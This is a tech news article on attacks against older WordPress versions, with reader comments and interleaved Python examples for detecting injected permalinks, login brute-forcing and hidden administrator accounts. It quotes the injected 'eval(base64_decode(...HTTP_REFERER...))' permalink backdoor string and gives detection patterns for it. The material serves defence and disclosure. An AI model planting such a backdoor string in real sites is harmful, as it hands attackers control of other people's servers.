We’re hearing numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest blogging engines, with over 5,317,360 (and counting) downloads of its latest version, 2.8. Many large blogs, including TechCrunch, rely on WordPress to get the news out and post content online.
Writes Lorelle on her WordPress-centric blog:
There are two clues that your WordPress site has been attacked:
First, there are strange additions to permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize.
To prevent this attack, if you have not done so already, update your WordPress install immediately to the latest version. Change all your passwords to a strong password (cough), including WordPress blog access for all users, database, FTP, control panels, etc. These are all highly recommended procedures.
Automattic, WordPress’ parent company, hasn’t commented on this issue, but we’ll keep everyone updated. In the meantime, we urge you to update your WordPress blog immediately.
Update: We’ve reached out to Matt Mullenweg, founder of WordPress, and he mentioned the following: Automattic is not the parent company of WordPress; Automattic contributes to WordPress.org like many other companies do. Mullenweg published a blog post mentioning what steps people should take to ensure their WordPress blog is safe.
(Image via Developer Tutorials)
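The first clue quoted above, the permalink structure carrying eval and base64_decode, can be checked mechanically rather than by eye. The following is an added example (not code from the article, from Lorelle, or from WordPress): it URL-decodes a permalink structure, flags constructs that have no business in one, and shows what a Referer header would turn into if that string were ever evaluated as PHP. The sample values are constructed for the example and modelled on the string quoted in the article; option names other than permalink_structure are assumptions.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote

# Constructed samples, not data from any real site. INJECTED is modelled on the
# permalink structure quoted in the article; CLEAN is an ordinary one.
INJECTED = ("/category/%postname%/%&(%7B$%7Beval(base64_decode("
            "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
CLEAN = "/category/%postname%/"

# A permalink structure should contain only path characters and %tag% tokens.
# PHP function calls, superglobals and ${...} interpolation do not belong there.
DANGEROUS = re.compile(
    r"eval\s*\(|base64_decode\s*\(|assert\s*\(|preg_replace\s*\("
    r"|\$_(?:SERVER|GET|POST|REQUEST|COOKIE)|\$\{",
    re.IGNORECASE,
)


def permalink_findings(value: str) -> list:
    """Suspicious constructs in a permalink structure. The value is URL-decoded
    first because the injected string is usually seen percent-encoded, exactly
    as in the article's example."""
    decoded = unquote(value)
    return sorted({m.group(0).lower() for m in DANGEROUS.finditer(decoded)})


def scan_options(options: dict) -> dict:
    """Run the same check over a set of wp_options values (option_name ->
    option_value) and keep only the ones with findings."""
    return {name: f for name, value in options.items() if (f := permalink_findings(value))}


def referer_payload(referer: str) -> Optional[str]:
    """What eval(base64_decode($_SERVER[HTTP_REFERER])) would execute for a given
    Referer header. An ordinary URL is not valid base64 and yields None; a header
    crafted by the attacker decodes to PHP source."""
    try:
        return base64.b64decode(referer, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


if __name__ == "__main__":
    print("clean:", permalink_findings(CLEAN))
    print("injected:", permalink_findings(INJECTED))
    print("referer decodes to:", referer_payload(base64.b64encode(b"phpinfo();").decode()))
```

To check a live site, read the value straight from the database with `SELECT option_value FROM wp_options WHERE option_name = 'permalink_structure';` (substitute your table prefix) rather than trusting the settings screen, then reset it from Settings > Permalinks after upgrading, as the comments below advise.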
I’m guessing .com users are fine, and that this only applies to older versions of .org?
They are talking about self-hosted WordPress sites.
4 ways to find out if your Wordpress installation has been affected by this bug: http://tinyurl.com/m6yz9f
Can someone answer this question please: If your blog has been affected, does upgrading to the most current version get rid of the bug? Thanks in advance.
Joomla.
I had a Joomla site and was hacked for not upgrading. All open source is the same. You need to upgrade
No it doesn’t, the unauthorized admin account is still there.
no.
No it doesn’t, once someone has access upgrading it will not undo that access if they managed to change passwords, etc.
Of course, the upgrade will remove the bugs.
Nice post. Thanks for sharing. This alerts the whole blogging community, and saves from risks, also helps to get the normal functionality by a simple upgrade with more security. WordPress really serves good.
UPDATE: Two more ways to detect the hack: http://is.gd/2WJX4
thanks .. I have upgraded to the latest version ….
Best,
Daina
Thanks, I have heard about this and Google has once warned webmasters about using older WP version. I always upgraded to the latest version. Thanks
It’s not just about having the latest version of WP – which helps. It’s about having a clearly laid out hacker prevention plan. There are many other things that need to be done in order to protect your WP install (as with any other platform).
WordPress is simple to install. This causes a false sense of security, especially with the bulk of WP users who really don’t understand anything past the WP dashboard.
Hindsight is always 20-20. Do your research and make your site secure.
Recently I also saw such an attack on my friend’s site. His blog was running on an older version. At first I thought there was an error in the database, but after a little research on the internet I got the point: I changed the permalink structure and the problem was solved. I immediately upgraded that blog to the latest version. Everything is under control now.
Maybe TechCrunch should update their site from V2.7 as well? Or did you implement a plugin that states the incorrect version?
Google “Wordpress Security”. There are many things one can do to prevent attacks and getting hacked.
We install this plugin on all of our sites: http://wordpres...-security-scan/
Your post only touches the surface of this issue.
)-:
+1 LOL
If you want to simply hide your WordPress version from possible attackers (might be a good idea for TechCrunch) all you need to do is add one line to your theme’s functions.php file:
http://gist.github.com/167926
WordPress is far from perfect; it still has a memory overrun error where the application runs out of memory.
But I did not know that TechCrunch uses WordPress!
Also, I am having unknown people signing up as users in my blog. Should I be worried?
My question is why would you allow “unknown” people sign up in the first place?
… because some of the blogs are community blog and admins allow visitors to become members.
It should be controlled from Dashboard general settings. Check back pl.
If you are allowing signups in your WP blogs, watch out for “.ru” domains, or “viagra” or “meds” type of names.
If you don’t allow signups, better upgrade your site. My sites were victims of such attacks, as mentioned in this TC article. There were unknown users signing up on my blog, although I’m not accepting signups.
Thanks for this alert. Today itself I received an email with alert to the reset of admin panel in my wordpress installation. Also I do keep hearing horrible stories on the sites being hacked.
This alert from techcrunch will prove to be lifesaver for many.
And why didn’t this happen when the older versions were the latest ones?
This is publicity gimmick.
Wordpress Antivirus is a must install plugin which will make sure that your wordpress blog stays unaffected by malicious code and hackers: http://tinyurl.com/wpantivirus
Thanks for this. I plan on testing it on one of our sites.
This plugin only seems to scan the site’s active template files. And when it finds something suspicious you are left wondering what to do.
The fact that a CMS needs “virus/malware” software of its own is frightening. WordPress is the BIND/Sendmail of the blogging world.
I have got this warning before and am always prompt in updating, but the administrator (2) problem sounds very inquisitive. How can there be a hidden administrator? If it is such then there could be a big havoc!
I had a “viagra” pharmacy (or their affiliate) injecting a re-direct in my WordPress installation and it’s incredibly tough to figure out where they’ve placed it.
Even after the latest upgrade and some extensive search for the “location” code, it’s still there and I have no choice but to hire a WP specialist to dig into the site.
Wordpress started to turn into phpnuke, which was a hackers paradise.
And perhaps change your admin’s e-mail to something less conspicuous than “admin@techcrunch.com”. Sorry guys…..
I’ll stop now……
To the Techcrunch Admins:
Guys, I would suggest you hide the direct login path to the WordPress login area. Anyone can type wp-login.php and get to the login page for TechCrunch. You can use .htaccess to redirect such requests to your homepage.
Of course one needs to know the username and password to log in, but brute force and dictionary attacks are possible here if the login page is in the open.
To prevent those you can apply the WP Login Lockdown plugin, which stalls and prevents such attacks. I have seen that many popular blogs are using that plugin, and it’s really effective and keeps hackers at bay!
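The brute-force concern raised in this comment can also be checked after the fact from the web server’s access log, which is useful for finding what a lockdown plugin did not stop and for getting the offending IP. The following is an added example, not the commenter’s code and not the Login Lockdown plugin: it parses constructed Apache combined-format lines and flags any client that POSTs to wp-login.php repeatedly inside a short window. It assumes a failed WordPress login re-renders the form with status 200 while a successful one redirects with 302; adjust the filter if your setup differs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format lines, not a real log. One client hammers
# wp-login.php with POSTs a few seconds apart; another logs in normally.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Sep/2009:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.7 - - [03/Sep/2009:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.7 - - [03/Sep/2009:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.7 - - [03/Sep/2009:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.7 - - [03/Sep/2009:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.7 - - [03/Sep/2009:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
203.0.113.9 - - [03/Sep/2009:10:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Sep/2009:10:01:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Sep/2009:10:01:21 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """(ip, timestamp, method, path, status) for one access-log line, or None
    if the line does not match the combined format."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def login_bursts(lines, threshold=5, window=timedelta(minutes=10)):
    """Clients that POSTed to wp-login.php and got the form back (status 200,
    treated here as a failed attempt; assumption, see lead-in) at least
    `threshold` times within any `window`. Returns {ip: peak attempts}."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path.split("?")[0] == "/wp-login.php" and status == 200:
            attempts[ip].append(ts)

    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        peak = 0
        # sliding window over the sorted timestamps
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, n in login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {n} login attempts inside one window")
```

Run it over the real log with `login_bursts(open("/var/log/apache2/access.log").read().splitlines())`; the IPs it returns are the ones to block at the .htaccess or firewall level, and a status other than 200 in the last attempt from a flagged IP is the case to investigate first.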
Using strong FTP password is like putting lipstick on a pig. FTP transfers all credentials as plain text, so those can be sniffed. Use SFTP instead.
This absolutely destroyed my blog, which has been “down” for a very long time now. I’ve moved everything and upgraded software, so I’ll be back in business any day. This is a nasty hack that essentially turned control of my site over to others.
Terri: Delete readme.html from public_html. No use telling people what version you are running!
TechCrunch do the same…… and Daniel from your blog also….
Thanks for the tip. The files install.php and install-helper.php inside the wp-admin directory must also be renamed to something different!
WordPress has and will continue to be vulnerable to attacks. The sad fact is that the code base is very poor and it’s truly astonishing that it is so widely used. Yes, WordPress works and is great software, but the core could be MUCH better.
I know, you look at the codebase for projects like this and it’s like WTF? But so many people use it…
Agree, and it saps CPU too. Caching should be part of the original build.
Thanks for informing us TC and for the hints too.
Wordpress security must be taken seriously… I would recommend:
-Install a logging plugin to it (to alert on new attacks, and get an audit trail of everything that is going on):
http://www.ossec.net/wpsyslog2
-Monitor your site on real time. This free online tool will notify you if your site is ever modified by an attacker or blacklisted:
http://www.sucuri.net
-Stay updated. This link can verify the version of your wordpress site and check if you have any vulnerable plugin or incorrect server config:
http://sucuri.n...x.php?page=scan
Thanks,
Install this simple plugin on any WordPress to block bad queries like that:
http://pastebin.com/f6697b79
It could easily be expanded to also look at $_POST data which is another form of attack you’ll never see in your logs.
Thanks a lot _ck_
This must have happened to me, I noticed the weird permalinks and then upgraded to the latest version. I checked for users I didn’t recognize and there aren’t any, it looks okay… question now is what else should I look for? I know I’ve been compromised, what else do I do?
Wait on second look, I did have an unauthorized admin user! He just wasn’t showing up on the list. It was funny… when I looked at my users, it said there were 5 admins. But only four on the list, and I know all four. When I queried the database outside wordpress, the fifth showed up. sneaky.
As a side point, why have you illustrated this article with a modified piece of Halo 3 artwork? I mean, I’m not complaining, I just don’t get what you’re referencing.
I was just wondering the same. It doesn’t really make sense..
What?! You mean Wordpress has security holes?!
Wordpress is Swiss cheese and always has been. Anyone who is installing WP for himself should already know this. I hope.
But I suppose it’s good that you gave a polite hint to those who don’t know. The webservers of people who don’t do their research end up inadvertently DDoSing the servers of those of us who do.
WordPress too… I suppose it’s all due to the recession; a lot of people explored the security lapses.
First off, Don’t this link, mentione in one of above comments: wordpress.com/security/last328 (Spammy link).
Second most, it’s not only happening on older WordPress software, even WordPress 8.1 is getting tons of RFIs and spam query strings injection.
I’m pretty sure Firehost keeps your Wordpress install updated automatically, plus they’ve got solid support.
/plug
Correction to typos:
1. WordPress 8.1 -> WordPress 2.8.1
2. Dont’ this link -> dont’ visit this link
I had this problem few weeks ago and I wrote about my experience in a blog post (http://mixd.in/X) also listing the plugins I used to secure my blog.
Besides keeping the blog updated, a best practice would be to make it as “customized” as possible.
Get rid of the Admin user and create an admin user with a different name, change the prefix of your tables to something different from wp_, and double check the chmod of all your files.
They seem to use admin(letter) as well. If you’re lucky, you can see the unexpected administrators for a split second.
The exploit inserts some html in wp_usermeta that uses html to attempt to hide the injected admin users from being listed.
I’ve found them through all instances of Wordpress that I run, even the ones that have been kept current
There’s also someone out there inserting admin accounts named ‘Wordpress’ – nicely done.
Tech Crunch please add more details to this article. This cannot be fixed by just changing your passwords.
You first need to go to permalink settings and manually remove those codes. Then remove the extra admin user that has been added.
http://www.wpbe...-latest-attack/
Anyone who has been hacked, look at the article above for a fix and further security.
I have immediately shifted to latest version. Thank God.
I realize that folks here are taking a tech centered approach to this issue, and that’s fabulous and very helpful. But I really wish we in this industry, and legal brains like Mike Arrington especially, would push hard for tougher laws on the crooks who create these problems in the first place. Every instance of a hack like that should result in one count of breaking and entering. This would mean thousands of counts and years and years in jail.
I also realize that these people are extremely difficult to locate, and when they are found they’re often in Eastern Europe or whatever.
Nevertheless, I think that the criminal angle needs to be codified as much as possible through tougher laws. Maybe if examples are set in the U.S. they’ll be followed elsewhere (hoping laughter is kept to a minimum here).
Unfortunately, it’ll never happen, because too many techies have a grudging admiration for criminal hackers.
People assume all hacks come from Eastern Europe; they are wrong! When my blog was hacked I checked the log files and discovered the hacker’s IP was from California, USA.
The hacker inserted hidden links. I wasn’t aware of the hack until Google sent me an email informing me my site was being removed temporarily from their index. They slapped me with a 30-day penalty and I lost 80% of my traffic plus lost income opportunity from AdSense.
Another sign your site might have been hacked is to check your traffic: has it dropped too much? That could be a sign Google has de-indexed your blog and has not told you why.
The hacker installed 700 hidden links in my blog’s footer. To fix the problem I removed WordPress and installed a fresh one. But this latest hack might prove to be a big problem because the malware seems to install spam (hidden links) into old blog posts. Just re-installing WordPress might not be enough to remove it; to remove it completely you either clean each post or delete the post and lose valued traffic.
I have since installed the WordPress Firewall plugin in all my blogs. This plugin will even send you an email when someone tries to hack your site, plus the hacker’s IP.
I wonder whether the six hack attempts on my main blog last month were from this latest hack?
Cool
Thanks for the heads up Tech Crunch! I’ve updated to the latest version of WordPress. It’s kind of ironic that TechCrunch, CrunchGear, and MobileCrunch are still using 2.7.1!
I am trying to upgrade my blog to WordPress from the Blogger host but am unable to due to various problems.
Dhakalji. Blogger is good too. I am sticking with it.
Ya, it’s good… you know, if you don’t care about your blog being down all the time…
“WordPress is one of the largest blogging engines with over 5,317,360 – and counting – downloads for their latest version, 2.8. Many large blogs, including TechCrunch, rely on WordPress to get the news out and post content online.”
WHY CAN’T THEY COME UP WITH A STABLE VERSION?
This isn’t exactly easy. Has there ever been any software or internet applications that are completely secure and stable? Especially anything open source is particularly vulnerable because the whole system is transparent.
Not looking good at all.
I run several WordPress blogs and luckily I have not had any issues like this.
This is very frightening. I have been using Wordpress since I was like eight years old. I hope my blog has not been infected with one of these invisible viruses.
Does anybody know any other warning signs?
Also, can this virus affect one’s pageviews? Does it travel over RSS feeds?
Also, will it change the content of posts? Does it make it so that you are more susceptible to spam?
Wow, there are many questions this raises in my mind.
NS
Wow, this is a little scary… might explain what happened to one of my favorite sites. They have been down for a week now with no explanation.
oooo
It is always good to upgrade to the latest version as soon as it is available for download. My personal WordPress blog too was hacked and had some script injected into every .php page. This taught me a big lesson. Still, there are many ways to protect it. This may help users to protect their WordPress blog. @ http://annanta....wordpress-blog/
I upgraded my blog today and saw there were 3 admins.. me, my wife and … no one? Although the site displayed a total of 3 admins, only two showed up. I decided I was going to try and delete all users I did not know (since it is my personal blog) and when I did, it asked who I wanted to associate posts and links to from the deleted users. In the drop down, it showed myself, my wife and some other random name… the missing admin! I looked at the source code and found the user id and was able to manually delete the user account. I was VERY surprised to see this happen.
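The second clue from the article, the hidden administrator, is described in several comments above: the admin count is one higher than the names listed, and the account hides itself with HTML placed in wp_usermeta. The following is an added example, not code from the article, from any commenter, or from WordPress: it reads constructed wp_users and wp_usermeta rows, decides who is an administrator from the serialized wp_capabilities value rather than from what the UI shows, and flags administrators whose fields carry markup. The rows are made up for the example; the table prefix wp_ and the use of first_name as the tainted field are assumptions.

```python
import re

# Constructed sample rows modelled on the wp_users and wp_usermeta tables; not
# data from any real site. User 3 is the injected administrator: its
# capabilities are genuine, but a metadata field that the user list echoes
# carries markup, so the row never renders in the admin screen even though
# the admin count still includes it.
WP_USERS = [
    {"ID": 1, "user_login": "jane", "display_name": "Jane"},
    {"ID": 2, "user_login": "writer", "display_name": "Writer"},
    {"ID": 3, "user_login": "admina", "display_name": "admina"},
]
WP_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (1, "first_name", "Jane"),
    (2, "wp_capabilities", 'a:1:{s:6:"author";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (3, "first_name", '<div style="display:none">'),   # the hiding trick (assumed field)
]

# wp_capabilities is a PHP-serialized array, e.g. a:1:{s:13:"administrator";b:1;}.
# Only the role => bool items matter here, so a regex over them is enough.
CAP_ENTRY = re.compile(r's:\d+:"([^"]+)";b:([01]);')
HTML_TAG = re.compile(r"<[^>]*>")


def parse_roles(serialized):
    """Roles switched on in a serialized wp_capabilities value."""
    return {role for role, flag in CAP_ENTRY.findall(serialized) if flag == "1"}


def group_meta(usermeta):
    """{user_id: {meta_key: meta_value}} from (user_id, key, value) rows."""
    meta = {}
    for uid, key, value in usermeta:
        meta.setdefault(uid, {})[key] = value
    return meta


def administrators(users, usermeta, prefix="wp_"):
    """IDs of every administrator according to the database, not the UI.
    `prefix` is the table prefix; the capabilities meta key is prefix + 'capabilities'."""
    meta = group_meta(usermeta)
    return sorted(
        u["ID"] for u in users
        if "administrator" in parse_roles(meta.get(u["ID"], {}).get(prefix + "capabilities", ""))
    )


def hidden_administrators(users, usermeta, prefix="wp_"):
    """Administrators whose login, display name or any metadata value contains
    markup. A legitimate account has no reason to carry tags in these fields;
    an injected one uses them to break its row out of the rendered list."""
    admins = set(administrators(users, usermeta, prefix))
    meta = group_meta(usermeta)
    hidden = []
    for u in users:
        if u["ID"] not in admins:
            continue
        fields = [u["user_login"], u["display_name"], *meta.get(u["ID"], {}).values()]
        if any(HTML_TAG.search(f) for f in fields):
            hidden.append(u["ID"])
    return hidden


def admin_counts(users, usermeta, prefix="wp_"):
    """(administrators in the database, rows you would actually see listed).
    The two numbers disagree exactly when an account is being hidden."""
    total = administrators(users, usermeta, prefix)
    hidden = hidden_administrators(users, usermeta, prefix)
    return len(total), len(total) - len(hidden)


if __name__ == "__main__":
    print("administrators:", administrators(WP_USERS, WP_USERMETA))
    print("hidden:", hidden_administrators(WP_USERS, WP_USERMETA))
    print("count vs visible:", admin_counts(WP_USERS, WP_USERMETA))
```

To pull the real rows, run `SELECT u.ID, u.user_login, u.display_name, m.meta_key, m.meta_value FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID;` against the site database and feed the result into the functions above. Once an ID is identified, delete the wp_users row and all of its wp_usermeta rows, then review any posts or links attributed to it, as the commenter above did by hand.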
You should probably remove that automattic is the parent company to prevent confusion as it is not the parent company of wordpress.
Thanks Tech Crunch for informing us.
WordPress is just so popular and therefore more interesting for attacks. Everybody is learning something out of this, isn’t it?
Therefore wordpress will become even better and better!
Hi, I’m running a fairly old version of WP (namely 2.7). Should I be worried?
mark2block
WordPress has published a blog post named ‘How to Keep WordPress Secure’. It tells you how to secure your WordPress. http://wordpres...rdpress-secure/
Security of blogging software is a big problem. How to resolve these kinds of questions is still unclear.
The developers should work hard on it.
Hi, WordPress is a great tool for blogging.
Can someone please tell me — if my site has been hacked (which it has), does upgrading fix it?
The reason I couldn’t upgrade is because I kept getting this error message:
Could not copy file: /public_html/wp-content/upgrade/core/wordpress/wp-comments-post.php
Any suggestions?
If the older version is exposed to security threats, then why are users using the older version?
Older versions of WordPress must be upgraded to the latest version of WordPress.
Older versions had some security bugs that are removed now.
Well, I run WordPress and I always keep it updated.